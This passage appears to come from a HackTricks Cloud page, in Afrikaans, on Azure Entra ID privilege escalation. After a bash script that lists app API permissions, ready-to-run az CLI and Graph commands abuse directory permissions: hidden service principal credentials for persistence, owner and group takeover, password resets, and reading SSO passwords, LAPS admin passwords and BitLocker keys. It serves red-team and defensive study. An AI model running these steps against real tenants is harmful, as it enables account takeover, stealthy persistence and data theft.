Known Microsoft first-party owner organization IDs.

MICROSOFT_OWNER_ORG_IDS=( “f8cdef31-a31e-4b4a-93e4-5f571e91255a” “72f988bf-86f1-41af-91ab-2d7cd011db47” )

is_microsoft_owner() { local owner=“$1” local id for id in “${MICROSOFT_OWNER_ORG_IDS[@]}”; do if [ “$owner” = “$id” ]; then return 0 fi done return 1 }

get_permission_value() { local resource_app_id=“$1” local perm_type=“$2” local perm_id=“$3” local key value key=“${resource_app_id}|${perm_type}|${perm_id}”

value=“$(awk -F ‘\t’ -v k=”$key“ ‘$1==k {print $2; exit}’ “$tmp_perm_cache”)“ if [ -n “$value” ]; then printf ‘%s\n’ “$value” return 0 fi

if [ “$perm_type” = “Scope” ]; then value=“$(az ad sp show –id “$resource_app_id” –query “oauth2PermissionScopes[?id==‘$perm_id’].value | [0]” -o tsv 2>/dev/null || true)“ elif [ “$perm_type” = “Role” ]; then value=“$(az ad sp show –id “$resource_app_id” –query “appRoles[?id==‘$perm_id’].value | [0]” -o tsv 2>/dev/null || true)“ else value=“” fi

[ -n “$value” ] || value=“UNKNOWN” printf ‘%s\t%s\n’ “$key” “$value” >> “$tmp_perm_cache” printf ‘%s\n’ “$value” }

command -v az >/dev/null 2>&1 || { echo “az CLI not found” >&2; exit 1; } command -v jq >/dev/null 2>&1 || { echo “jq not found” >&2; exit 1; } az account show >/dev/null

apps_json=“$(az ad app list –all –query ‘[?length(requiredResourceAccess) > 0].[displayName,appId,requiredResourceAccess]’ -o json)”

tmp_map=“$(mktemp)” tmp_ids=“$(mktemp)” tmp_perm_cache=“$(mktemp)” trap ‘rm -f “$tmp_map” “$tmp_ids” “$tmp_perm_cache”’ EXIT

Build unique resourceAppId values used by applications.

jq -r ‘.[][2][]?.resourceAppId’ <<<“$apps_json” | sort -u > “$tmp_ids”

Resolve resourceAppId -> owner organization + API display name.

while IFS= read -r rid; do [ -n “$rid” ] || continue sp_json=“$(az ad sp show –id “$rid” –query ‘{owner:appOwnerOrganizationId,name:displayName}’ -o json 2>/dev/null || true)“ owner=“$(jq -r ‘.owner // “UNKNOWN”’ <<<“$sp_json”)“ name=“$(jq -r ‘.name // “UNKNOWN”’ <<<“$sp_json”)“ printf ‘%s\t%s\t%s\n’ “$rid” “$owner” “$name” >> “$tmp_map” done < “$tmp_ids”

echo -e “appDisplayName\tappId\tresourceApiDisplayName\tresourceAppId\tisMicrosoft\tpermissions”

Print all app API permissions and mark if the target API is Microsoft-owned.

while IFS= read -r row; do app_name=“$(jq -r ‘.[0]’ <<<”$row“)“ app_id=“$(jq -r ‘.[1]’ <<<”$row“)“

while IFS= read -r rra; do resource_app_id=“$(jq -r ‘.resourceAppId’ <<<”$rra“)“ map_line=“$(awk -F ‘\t’ -v id=”$resource_app_id“ ‘$1==id {print; exit}’ “$tmp_map”)“ owner_org=“$(awk -F’\t’ ‘{print $2}’ <<<”$map_line“)“ resource_name=“$(awk -F’\t’ ‘{print $3}’ <<<”$map_line“)“

[ -n “$owner_org” ] || owner_org=“UNKNOWN” [ -n “$resource_name” ] || resource_name=“UNKNOWN”

if is_microsoft_owner “$owner_org”; then is_ms=“true” else is_ms=“false” fi

permissions_csv=“” while IFS= read -r access; do perm_type=“$(jq -r ‘.type’ <<<”$access“)“ perm_id=“$(jq -r ‘.id’ <<<”$access“)“ perm_value=“$(get_permission_value “$resource_app_id” “$perm_type” “$perm_id”)“ perm_label=“${perm_type}:${perm_value}” if [ -z “$permissions_csv” ]; then permissions_csv=“$perm_label” else permissions_csv=“${permissions_csv},${perm_label}” fi done < <(jq -c ‘.resourceAccess[]’ <<<“$rra”)

echo -e “${app_name}\t${app_id}\t${resource_name}\t${resource_app_id}\t${is_ms}\t${permissions_csv}” done < <(jq -c ‘.[2][]’ <<<“$row”) done < <(jq -c ‘.[]’ <<<“$apps_json”)

</details>

## Service Principals

### `microsoft.directory/servicePrincipals/credentials/update`

Dit laat 'n attacker toe om credentials by bestaande service principals te voeg. As die service principal verhoogde privileges het, kan die attacker daardie privileges aanneem.
```bash
az ad sp credential reset --id <sp-id> --append

Caution

Die nuwe gegenereerde wagwoord sal nie in die web console verskyn nie, so dit kan ’n stealth manier wees om persistence oor ’n service principal te behou.
Vanaf die API kan hulle gevind word met: az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json

As jy die fout "code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid." kry, is dit omdat dit nie moontlik is om die passwordCredentials property te wysig van die SP nie en eers moet jy dit ontsluit. Hiervoor het jy ’n permission (microsoft.directory/applications/allProperties/update) nodig wat jou toelaat om die volgende uit te voer:

az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<sp-object-id> --body '{"servicePrincipalLockConfiguration": null}'

microsoft.directory/servicePrincipals/synchronizationCredentials/manage

Dit laat ’n attacker toe om credentials by bestaande service principals te voeg. As die service principal elevated privileges het, kan die attacker daardie privileges aanneem.

az ad sp credential reset --id <sp-id> --append

microsoft.directory/servicePrincipals/owners/update

Soortgelyk aan toepassings, laat hierdie toestemming toe om meer eienaars by ’n service principal te voeg. Om ’n service principal te besit, bied dit beheer oor sy inlogbewyse en toestemmings.

# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

az ad sp credential reset --id <sp-id> --append

# You can check the owners with
az ad sp owner list --id <spId>

Caution

Nadat ek ’n nuwe owner bygevoeg het, het ek probeer om dit te verwyder, maar die API het geantwoord dat die DELETE-metode nie ondersteun is nie, selfs al is dit die metode wat jy moet gebruik om die owner te verwyder. Dus kan jy deesdae nie owners verwyder nie.

microsoft.directory/servicePrincipals/disable and enable

Hierdie toestemmings laat toe om service principals te disable en te enable. ’n Aanvaller kan hierdie toestemming gebruik om ’n service principal wat hy op een of ander manier kan bekom te enable om sodoende bevoegdhede te eskaleer.

Neem kennis dat vir hierdie tegniek die aanvaller meer toestemmings nodig sal hê om die ge-enablede service principal oor te neem.

# Disable
az ad sp update --id <ServicePrincipalId> --account-enabled false

# Enable
az ad sp update --id <ServicePrincipalId> --account-enabled true

microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials & microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials

Hierdie toestemmings laat toe om credentials vir single sign-on te skep en te kry, wat toegang tot derdeparty-toepassings kan gee.

# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"


# Get credentials of a specific credID
credID="<credID>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"

Groepe

microsoft.directory/groups/allProperties/update

Hierdie toestemming maak dit moontlik om gebruikers by privileged groups te voeg, wat tot privilege escalation kan lei.

az ad group member add --group <GroupName> --member-id <UserId>

Let op: Hierdie toestemming sluit Entra ID role-assignable groups uit.

microsoft.directory/groups/owners/update

Hierdie toestemming maak dit moontlik om ’n eienaar van groepe te word. ’n Eienaar van ’n groep kan groepslidmaatskap en instellings beheer, wat potensieel bevoegdhede na die groep kan eskaleer.

az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>

Let wel: Hierdie toestemming sluit Entra ID roltoewysbare groepe uit.

microsoft.directory/groups/members/update

Hierdie toestemming laat toe om lede by ’n groep te voeg. ’n Aanvaller kan homself of kwaadwillige rekeninge by bevoorregte groepe voeg, wat verhoogde toegang kan gee.

az ad group member add --group <GroupName> --member-id <UserId>

microsoft.directory/groups/dynamicMembershipRule/update

Hierdie toestemming laat toe om membership rule in dynamic group op te dateer. An attacker kan dynamic rules wysig om homself in privileged groups in te sluit sonder eksplisiete toevoeging.

groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'

Nota: Hierdie toestemming sluit Entra ID role-assignable groups uit.

Dynamic Groups Privesc

Dit kan moontlik wees dat gebruikers escalate privileges deur hul eie eienskappe te wysig sodat hulle as lede van dynamic groups bygevoeg word. Vir meer inligting sien:

Az - Dynamic Groups Privesc

Gebruikers

microsoft.directory/users/password/update

Hierdie toestemming maak dit moontlik om die wagwoord van nie-admin gebruikers terug te stel, wat ’n potensiële aanvaller in staat stel om privileges te escalate na ander gebruikers. Hierdie toestemming kan nie aan custom roles toegewys word nie.

az ad user update --id <user-id> --password "kweoifuh.234"

microsoft.directory/users/basic/update

Hierdie voorreg laat toe om die eienskappe van die gebruiker te wysig. Dit is algemeen om dinamiese groepe te vind wat gebruikers byvoeg gebaseer op eienskapwaardes; daarom kan hierdie toestemming ’n gebruiker toelaat om die nodige eienskapswaarde te stel om lid van ’n spesifieke dinamiese groep te word en sodoende voorregte te eskaleer.

#e.g. change manager of a user
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'

#e.g. change department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"

Conditional Access Policies & MFA bypass

Verkeerd gekonfigureerde conditional access policies wat MFA vereis, kan omseil word — kyk:

Az - Conditional Access Policies & MFA Bypass

Toestelle

microsoft.directory/devices/registeredOwners/update

Hierdie toestemming maak dit vir aanvallers moontlik om hulself as eienaars van toestelle aan te wys, sodat hulle beheer of toegang tot toestelspesifieke instellings en data kan verkry.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/devices/registeredUsers/update

Hierdie toestemming stel aanvallers in staat om hul rekening aan toestelle te koppel om toegang te kry of om sekuriteitsbeleide te omseil.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/deviceLocalCredentials/password/read

Hierdie toestemming laat attackers toe om die eienskappe van die rugsteun-credentials van plaaslike administrateurrekeninge op Microsoft Entra-aangeslote toestelle te lees, insluitend die wagwoord

# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"

# Get credentials
deviceLC="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \

BitlockerKeys

microsoft.directory/bitlockerKeys/key/read

Hierdie toestemming maak toegang tot BitLocker-sleutels moontlik, wat ’n aanvaller in staat kan stel om skywe te ontsleutel en sodoende die vertroulikheid van data in gevaar stel.

# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"

# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"

Ander interessante toestemmings (TODO)

• microsoft.directory/applications/permissions/update
• microsoft.directory/servicePrincipals/permissions/update
• microsoft.directory/applications.myOrganization/allProperties/update
• microsoft.directory/applications/allProperties/update
• microsoft.directory/servicePrincipals/appRoleAssignedTo/update
• microsoft.directory/applications/appRoles/update
• microsoft.directory/applications.myOrganization/permissions/update

Tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

• Kyk na die subscription plans!
• Sluit aan by die 💬 Discord group of die telegram group of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.